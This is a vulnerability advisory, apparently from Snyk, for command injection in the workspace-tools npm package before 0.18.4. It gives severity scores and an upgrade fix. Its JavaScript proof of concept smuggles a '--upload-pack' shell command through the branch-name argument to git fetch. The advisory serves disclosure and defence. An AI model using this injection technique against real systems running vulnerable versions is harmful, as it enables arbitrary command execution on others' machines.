Command Injection Affecting workspace-tools package, versions <0.18.4


0.0
high

Snyk CVSS

    Attack Complexity High
    Confidentiality High
    Integrity High
    Availability High

    Threat Intelligence

    Exploit Maturity Proof of concept
    EPSS 0.16% (53rd percentile)
Expand this section
NVD
9.8 critical

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID SNYK-JS-WORKSPACETOOLS-2421201
  • published 11 May 2022
  • disclosed 11 Mar 2022
  • credit Alessio Della Libera of Snyk Research Team

How to fix?

Upgrade workspace-tools to version 0.18.4 or higher.

Overview

workspace-tools is a JS Monorepo Workspace Tools.

Affected versions of this package are vulnerable to Command Injection via git argument injection. When calling the fetchRemoteBranch(remote: string, remoteBranch: string, cwd: string) function, both the remote and remoteBranch parameters are passed to the git fetch subcommand in a way that additional flags can be set. The additional flags can be used to perform a command injection.

PoC

const workspace_tools = require("workspace-tools");

workspace_tools.init("./", "username", "password") // or git init

let remote1 = "origin";
let remoteBranch1 = "--upload-pack=touch HELLO1;";
workspace_tools.fetchRemoteBranch(remote1, remoteBranch1, "./") // git [ 'fetch', 'origin', '--upload-pack=touch HELLO1;' ]

// let remote2 = "--upload-pack=touch HELLO2;";
// let remoteBranch2 = "foo";
// workspace_tools.fetchRemoteBranch(remote2, remoteBranch2, "./") // git [ 'fetch', '--upload-pack=touch HELLO2;', 'foo' ]